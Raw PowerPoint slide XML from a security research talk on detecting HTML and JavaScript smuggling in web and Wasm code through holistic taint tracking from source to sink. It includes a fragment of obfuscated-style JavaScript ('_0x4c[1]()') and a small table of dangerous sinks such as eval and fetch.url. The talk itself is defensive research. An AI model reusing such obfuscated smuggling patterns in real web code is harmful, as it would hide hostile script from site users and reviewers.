                  <a:solidFill>
                    <a:srgbClr val="37474F"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>](_0x4c[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C53929"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="37474F"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>]())</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" altLang="de-DE" sz="20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29" name="Grafik 28" descr="Ein Bild, das gelb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2DBC1678-0976-C8FE-2993-FBD70171B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59068" y="535011"/>
              <a:ext cx="601907" cy="6331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1F3DE2E-89D6-EA9B-4406-A07BBB47CC26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="2"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277295" y="3050348"/>
            <a:ext cx="11916" cy="11496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 descr="Tornado Silhouette">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31BAE61E-94F2-2CDE-74CC-0DD72815C0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7295" y="3062075"/>
            <a:ext cx="1126156" cy="1126156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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D23CBAB-13EB-0ECB-14D2-1A10863A95E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3239064" y="5185225"/>
            <a:ext cx="914400" cy="918246"/>
            <a:chOff x="4511900" y="88421"/>
            <a:chExt cx="914400" cy="918246"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Rechteck: abgerundete Ecken 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ADDF43F-5F3F-3F99-DCA9-2CC09C3B5B61}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4618062" y="88421"/>
              <a:ext cx="662145" cy="84545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Grafik 21" descr="Fingerabdruck mit einfarbiger Füllung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E7DD34-D97E-AADD-7744-D48994D3459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11900" y="92267"/>
              <a:ext cx="914400" cy="914400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B6B4149-99F8-5066-AE44-598D0B165458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="946993" y="4866294"/>
            <a:ext cx="10515600" cy="1527692"/>
            <a:chOff x="838200" y="4877887"/>
            <a:chExt cx="10515600" cy="1527692"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Rechteck: abgerundete Ecken 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2806A11D-09B8-4682-E132-B115ED43E6E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838200" y="4877887"/>
              <a:ext cx="10515600" cy="1526200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49" name="Rechteck 48" descr="Warnung">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90BD5B3E-6347-E627-EE15-2829F6C880A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1299875" y="5221282"/>
              <a:ext cx="840230" cy="839410"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a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sz="280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88CEB344-C8E3-D3D8-F5BB-14D08B8AB079}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2601781" y="4877887"/>
              <a:ext cx="8659375" cy="1527692"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 8659375"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1527692"/>
                <a:gd name="connsiteX1" fmla="*/ 8659375 w 8659375"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1527692"/>
                <a:gd name="connsiteX2" fmla="*/ 8659375 w 8659375"/>
                <a:gd name="connsiteY2" fmla="*/ 1527692 h 1527692"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 8659375"/>
                <a:gd name="connsiteY3" fmla="*/ 1527692 h 1527692"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 8659375"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 152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9375" h="1527692">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8659375" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8659375" y="1527692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15276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681" tIns="161681" rIns="161681" bIns="161681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HTML/JS code Smuggling is a real issue</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0"/>
                <a:t>!</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3724BDE7-65F2-605D-043F-9B6C428E527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813267" y="54934"/>
            <a:ext cx="2765425" cy="60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DA71C97-5A11-A18B-A3EB-ECC50EB3606D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8949857" y="273604"/>
            <a:ext cx="2809875" cy="442251"/>
            <a:chOff x="4776134" y="1105704"/>
            <a:chExt cx="2809875" cy="596499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF0BD0DE-3939-190E-C988-6B3BF2D5D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134" y="1106890"/>
              <a:ext cx="1203325" cy="595313"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7C6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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CF16EB6-8AB6-5443-CD81-8F6F6D33C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458" y="1105704"/>
              <a:ext cx="1541463" cy="595313"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7C6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D5A5432B-EBBA-E13D-56C2-75B5DD929E64}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4922184" y="1192941"/>
              <a:ext cx="2663825" cy="414338"/>
              <a:chOff x="4793532" y="1130514"/>
              <a:chExt cx="2663825" cy="414338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="69" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F31A6FDB-A4FA-9BEF-D9FF-D04AC72BA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7669" y="1130514"/>
                <a:ext cx="1309688" cy="41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2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#Domains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17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15FD67A1-DA6A-22FD-A398-0616AB59C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3532" y="1130514"/>
                <a:ext cx="633413" cy="41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2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Sink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3775FE6-0DCE-9DF9-E247-0718BA0A8292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8952320" y="712507"/>
            <a:ext cx="2784475" cy="652463"/>
            <a:chOff x="4647482" y="1639775"/>
            <a:chExt cx="2784475" cy="652463"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E388092-37A3-56AF-3303-D617BD0F2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482" y="1639775"/>
              <a:ext cx="1203325" cy="652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7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776A703F-45D2-313E-5CE0-C53F862F3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807" y="1639775"/>
              <a:ext cx="1541463" cy="652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Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{642126A8-9FA1-ED6C-CAD8-C9B0CA180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5844" y="1809638"/>
              <a:ext cx="646113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1054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BE8B9C6E-1BC3-420E-95D8-BD210A0E2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532" y="1809638"/>
              <a:ext cx="1035050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fetch.url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87EDC654-EE00-7600-18C6-47E2E2BEBB1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8949858" y="1195376"/>
            <a:ext cx="2800282" cy="481013"/>
            <a:chOff x="4633262" y="2292238"/>
            <a:chExt cx="2800282" cy="481013"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EC72FC3-7BA3-94B2-D738-5B7ABC0BE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262" y="2352057"/>
              <a:ext cx="1217546" cy="421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Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B8C544B-AC49-A077-2F42-39B2EEFD8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807" y="2292238"/>
              <a:ext cx="1541463" cy="481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Line 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB683239-EEAD-E1AD-C120-8F586B619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1132" y="2773250"/>
              <a:ext cx="2757488" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="7C6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Rectangle 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFE8A5A1-C8A8-88E9-0D8E-692BF249D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6019" y="2376375"/>
              <a:ext cx="517525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643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21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE3E932E-5A88-E2BE-D32D-E98D5B951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532" y="2376375"/>
              <a:ext cx="573088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eval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7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51303 -0.278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1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3D1C9-7D7E-534F-C9B6-10CEE61A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88327D8-7623-8B09-EACD-917901F7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856"/>
            <a:ext cx="10515600" cy="2852737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detect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>smuggling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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BF5886D-A171-9843-A4EF-3FE519CB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539722"/>
            <a:ext cx="10515600" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0" err="1"/>
              <a:t>Holistic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0" err="1"/>
              <a:t>Taint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="5000" b="1" dirty="0"/>
              <a:t> Tracking!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B5637F-1415-E918-6C0C-92D13E0C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697715-C3C3-D5F6-DF80-3498E785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451" y="6492874"/>
            <a:ext cx="5195099" cy="228601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securing the Next-Generation Web: A Holistic Approach to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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ACDB16-B9C1-31F4-9080-9E6C0352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3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5B92108-C93D-85BC-10A4-6509AF8A2649}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4127192" y="938388"/>
            <a:ext cx="3264625" cy="3151249"/>
            <a:chOff x="4136428" y="1640352"/>
            <a:chExt cx="3264625" cy="3151249"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rechteck: abgerundete Ecken 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4FA6515-BE22-98E7-DC10-993CE3E64360}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4293866" y="1931062"/>
              <a:ext cx="3107187" cy="2860539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40" name="Grafik 56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E1AFB3EC-887B-4AE4-09C5-262E4C5A6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136428" y="1640352"/>
              <a:ext cx="702077" cy="702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F39D3C-3FA1-08D2-CAFE-A82153F2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397BB3-861E-D6FE-8E2F-220D1FB3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C7D31B-1153-1070-246B-D9F7C71F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18</a:t>
            </a:fld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99FFB24-EA39-A351-31D7-2645539C9538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1514491" y="1017282"/>
            <a:ext cx="2823389" cy="631273"/>
            <a:chOff x="1523727" y="1719246"/>
            <a:chExt cx="2823389" cy="631273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0733B003-78CA-CB81-259A-A43D45BA4C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727" y="2329576"/>
              <a:ext cx="2823389" cy="20943"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="D58C2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E08D369-41FA-0AD9-3AF7-3D6FB3FBE0E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1782726" y="1719246"/>
              <a:ext cx="2465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Sensitive </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2800" dirty="0" err="1"/>
                <a:t>data</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="2800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D9A39A1-6E5D-93A8-CAC2-5DAE3D4E14F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7394977" y="1027816"/>
            <a:ext cx="3112084" cy="569619"/>
            <a:chOff x="7404213" y="1729780"/>
            <a:chExt cx="3112084" cy="569619"/>
          </a:xfrm>
        </p:grpSpPr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7D279EE7-6EA0-D8CC-70D9-06CE960F57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4213" y="2291176"/>
              <a:ext cx="3112084" cy="8223"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="7C60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4D0FEA9-1BED-7697-609A-4EED44A3AA05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7413449" y="1729780"/>
              <a:ext cx="27493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err="1"/>
                <a:t>Transformed</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2800" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2800" dirty="0" err="1"/>
                <a:t>data</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="2800" dirty="0"/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60C1A6AE-68BB-BDC7-9BED-7F60ADA9DFF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="319454" y="5084025"/>
            <a:ext cx="11580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/>
              <a:t>Towards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3600" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3600" dirty="0" err="1"/>
              <a:t>single</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3600" dirty="0" err="1"/>
              <a:t>taint-flow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fully </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="3600" dirty="0" err="1"/>
              <a:t>comprehend</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3600" dirty="0"/>
              <a:t> HTML and JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3600" dirty="0" err="1"/>
              <a:t>smuggling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3600" dirty="0"/>
              <a:t>!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34F343A-F412-2C27-CAAA-5EEAE1534F66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10516297" y="1211733"/>
            <a:ext cx="1567378" cy="976615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7C60C6"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7C6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Sink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6A2562C-5ED2-40C6-CF93-EDE1A1BD85D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="129912" y="1269399"/>
            <a:ext cx="1567378" cy="976615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D58C2E"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D58C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Source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F89DE555-7E4F-0BC6-8C5A-3A4C8A3BE1B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="129912" y="2968063"/>
            <a:ext cx="1567378" cy="976615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D58C2E"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D58C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Source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335812A-3911-FF40-2943-52DEB64141C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1758250" y="3463706"/>
            <a:ext cx="246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Sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0" err="1"/>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Freihandform: Form 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C3F4B0B-F7E8-3910-8781-EBC5DC1858EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1682404" y="2795502"/>
            <a:ext cx="8854440" cy="678294"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8854440"/>
              <a:gd name="connsiteY0" fmla="*/ 678294 h 678294"/>
              <a:gd name="connsiteX1" fmla="*/ 3139440 w 8854440"/>
              <a:gd name="connsiteY1" fmla="*/ 7734 h 678294"/>
              <a:gd name="connsiteX2" fmla="*/ 8854440 w 8854440"/>
              <a:gd name="connsiteY2" fmla="*/ 373494 h 67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4440" h="678294">
                <a:moveTo>
                  <a:pt x="0" y="678294"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="831850" y="368414"/>
                  <a:pt x="1663700" y="58534"/>
                  <a:pt x="3139440" y="7734"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4615180" y="-43066"/>
                  <a:pt x="6734810" y="165214"/>
                  <a:pt x="8854440" y="373494"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="1174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 descr="Ein Bild, das Clipart, Cartoon, Smiley, gelb enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B795F327-9709-3EE5-CD29-F8DD61420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63177" y="234710"/>
            <a:ext cx="1844040" cy="184404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366EFE42-EFA8-E2E6-FDA4-CF7FAD4041F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10476238" y="2749317"/>
            <a:ext cx="1567378" cy="976615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7C60C6"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7C6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Sink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2A84071-FCBD-F62B-4D70-F88A613E610C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7523359" y="3550884"/>
            <a:ext cx="2945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latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tranform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0"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62" name="Grafik 61" descr="Ein Bild, das Cartoon, Clipart, Grafiken, Kreativität enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A5DFE1E-FE50-F189-3099-09185F5F5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94522" y="3313901"/>
            <a:ext cx="1595002" cy="1595002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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FD87E7D5-6243-A95B-A589-672FAB5F5898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4533737" y="2424340"/>
            <a:ext cx="2702920" cy="70207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de-DE" sz="2800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>transform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22515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5" grpId="0" animBg="1"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="54" grpId="0" animBg="1"/>
      <p:bldP spid="43" grpId="0" animBg="1"/>
      <p:bldP spid="45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503FA9D-1C8C-D13D-CB0D-B13A0719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856"/>
            <a:ext cx="10515600" cy="2852737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>
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>detect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exploitation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br>
              <a:rPr lang="de-DE" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>runtime</a:t>
